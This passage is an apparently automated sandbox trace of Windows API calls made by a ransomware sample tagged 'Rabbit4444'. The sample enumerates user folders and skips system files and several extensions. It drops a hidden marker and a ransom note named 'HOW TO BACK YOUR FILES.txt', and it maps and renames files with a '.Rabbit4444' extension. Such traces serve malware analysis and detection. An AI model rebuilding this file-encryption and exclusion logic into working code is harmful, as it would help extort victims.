dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0071.082] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0071.082] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.082] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.082] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0071.082] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0071.082] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0071.082] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0071.082] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.082] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0071.082] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0071.082] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.082] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0071.082] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.082] lstrlenW (lpString="imprbeacons.dat") returned 15 [0071.082] lstrlenW (lpString="Rabbit4444") returned 10 [0071.082] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.083] lstrlenW (lpString=".dll") returned 4 [0071.083] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.083] lstrlenW (lpString=".lnk") returned 4 [0071.083] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.083] lstrlenW (lpString=".ini") returned 4 [0071.083] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.083] lstrlenW (lpString=".sys") returned 4 [0071.083] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.083] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdf610868, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x9bfcf60d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0071.083] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0071.083] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0071.083] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210469\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0071.084] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0071.084] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0071.085] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.085] CloseHandle (hObject=0x260) returned 1 [0071.085] CloseHandle (hObject=0x228) returned 1 [0071.085] GetCurrentThreadId () returned 0xd98 [0071.085] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0071.085] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914" [0071.085] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b380 | out: hHeap=0xe0000) returned 1 [0071.085] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0071.086] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914" [0071.086] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\" [0071.086] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\.BFC0E91B00AE8A0620D3" [0071.086] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\202914\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0071.089] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0071.091] FlushFileBuffers (hFile=0x228) returned 1 [0071.092] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0071.092] CloseHandle (hObject=0x228) returned 1 [0071.093] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914") returned 142 [0071.093] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.093] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8c8f68d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe8aa796b, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf3b26ec0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0071.093] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.093] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.093] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0071.093] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0071.093] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8c8f68d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe8aa796b, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf3b26ec0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.093] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.093] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.093] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0071.093] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0071.093] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0071.093] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3b26ec0, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3b26ec0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3b26ec0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0071.093] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.093] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0071.093] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735da87a, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x735da87a, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x73626e75, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x189c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504773410", cAlternateFileName="150477~1")) returned 1 [0071.093] lstrcmpiW (lpString1="1504773410", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.093] lstrcmpiW (lpString1="1504773410", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.093] lstrcmpiW (lpString1="1504773410", lpString2="Rabbit4444.exe") returned -1 [0071.093] lstrcmpiW (lpString1="1504773410", lpString2=".") returned 1 [0071.093] lstrcmpiW (lpString1="1504773410", lpString2="..") returned 1 [0071.093] lstrcmpiW (lpString1="1504773410", lpString2="windows") returned -1 [0071.093] lstrcmpiW (lpString1="1504773410", lpString2="bootmgr") returned -1 [0071.093] lstrcmpiW (lpString1="1504773410", lpString2="pagefile.sys") returned -1 [0071.093] lstrcmpiW (lpString1="1504773410", lpString2="boot") returned -1 [0071.093] lstrcmpiW (lpString1="1504773410", lpString2="ids.txt") returned -1 [0071.093] lstrcmpiW (lpString1="1504773410", lpString2="NTUSER.DAT") returned -1 [0071.094] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504773410" | out: lpString1="1504773410") returned="1504773410" [0071.094] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\1504773410", dwFileAttributes=0x0) returned 1 [0071.094] lstrlenW (lpString="1504773410") returned 10 [0071.094] lstrlenW (lpString="Rabbit4444") returned 10 [0071.094] lstrcmpiW (lpString1="1504773410", lpString2="Rabbit4444") returned -1 [0071.094] lstrlenW (lpString=".dll") returned 4 [0071.094] lstrcmpiW (lpString1="3410", lpString2=".dll") returned 1 [0071.094] lstrlenW (lpString=".lnk") returned 4 [0071.094] lstrcmpiW (lpString1="3410", lpString2=".lnk") returned 1 [0071.094] lstrlenW (lpString=".ini") returned 4 [0071.094] lstrcmpiW (lpString1="3410", lpString2=".ini") returned 1 [0071.094] lstrlenW (lpString=".sys") returned 4 [0071.094] lstrcmpiW (lpString1="3410", lpString2=".sys") returned 1 [0071.094] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\1504773410" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\202914\\1504773410"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.095] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.095] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16240532354) returned 1 [0071.095] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=6300) returned 1 [0071.095] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0071.095] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0071.095] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ba0, lpName=0x0) returned 0x27c [0071.096] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ba0) returned 0x70000 [0071.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x111008 [0071.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0071.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x111008 | out: hHeap=0xe0000) returned 1 [0071.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0071.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0071.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0071.098] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16240908146) returned 1 [0071.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0071.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0071.098] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.099] CloseHandle (hObject=0x27c) returned 1 [0071.099] CloseHandle (hObject=0x260) returned 1 [0071.099] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\1504773410.Rabbit4444") returned 164 [0071.099] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\1504773410" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\202914\\1504773410"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\1504773410.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\202914\\1504773410.rabbit4444"), dwFlags=0x1) returned 1 [0071.100] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c8f68d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x83f7d6d8, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xa4a596a5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0071.100] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.100] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.100] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.100] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0071.100] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0071.100] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0071.100] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0071.100] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.100] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0071.100] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0071.100] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.100] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0071.100] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.101] lstrlenW (lpString="eventbeacons.dat") returned 16 [0071.101] lstrlenW (lpString="Rabbit4444") returned 10 [0071.101] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.101] lstrlenW (lpString=".dll") returned 4 [0071.101] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.101] lstrlenW (lpString=".lnk") returned 4 [0071.101] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.101] lstrlenW (lpString=".ini") returned 4 [0071.101] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.101] lstrlenW (lpString=".sys") returned 4 [0071.101] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.101] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c8f68d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8387c826, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xa4a596a5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0071.101] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0071.101] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.101] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.101] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0071.101] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0071.101] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0071.101] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0071.101] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.101] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0071.101] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0071.101] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.101] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0071.101] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.102] lstrlenW (lpString="imprbeacons.dat") returned 15 [0071.102] lstrlenW (lpString="Rabbit4444") returned 10 [0071.102] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.102] lstrlenW (lpString=".dll") returned 4 [0071.102] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.102] lstrlenW (lpString=".lnk") returned 4 [0071.102] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.102] lstrlenW (lpString=".ini") returned 4 [0071.102] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.102] lstrlenW (lpString=".sys") returned 4 [0071.102] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.102] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c8f68d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8387c826, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xa4a596a5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0071.102] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0071.102] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0071.103] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\202914\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0071.103] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0071.103] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0071.105] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.105] CloseHandle (hObject=0x260) returned 1 [0071.105] CloseHandle (hObject=0x228) returned 1 [0071.105] GetCurrentThreadId () returned 0xd98 [0071.105] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fc8 [0071.105] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets" [0071.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x126308 | out: hHeap=0xe0000) returned 1 [0071.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fc0 | out: hHeap=0xe0000) returned 1 [0071.105] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets" [0071.105] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\" [0071.105] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\.BFC0E91B00AE8A0620D3" [0071.105] 